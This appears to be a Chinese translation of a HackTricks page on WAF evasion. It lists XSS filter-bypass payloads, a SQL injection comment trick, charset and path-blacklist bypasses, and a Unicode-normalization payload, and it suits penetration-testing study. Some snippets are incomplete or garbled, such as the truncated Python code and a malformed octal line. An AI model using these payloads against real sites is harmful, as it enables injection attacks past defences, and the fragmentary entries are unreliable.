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WAF 绕过
从零开始学习 AWS 黑客技术,成为 htARTE (HackTricks AWS 红队专家)!
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可以使用不同的技术来绕过防火墙上的正则表达式过滤器。示例包括交替大小写、添加换行符和编码有效载荷。可以在 PayloadsAllTheThings 和 OWASP 找到各种绕过的资源。下面的示例摘自这篇文章。
<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
# Charset encoding
multipart/form-data; charset=ibm037,boundary=blah
multipart/form-data; boundary=blah; charset=ibm037
##Python code
import urllib
s = 'payload'
## Request example
GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61
# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>
# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
Unicode 兼容性
根据 Unicode 正规化的实现方式(更多信息请见此处),共享 Unicode 兼容性的字符可能能够绕过 WAF 并执行预期的有效载荷。兼容字符可以在这里找到。
# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
<img src⁼p onerror⁼'prompt⁽1⁾'﹥ --> <img src=p onerror='prompt(1)'>
从零开始学习AWS黑客技术,成为 htARTE (HackTricks AWS Red Team Expert)!
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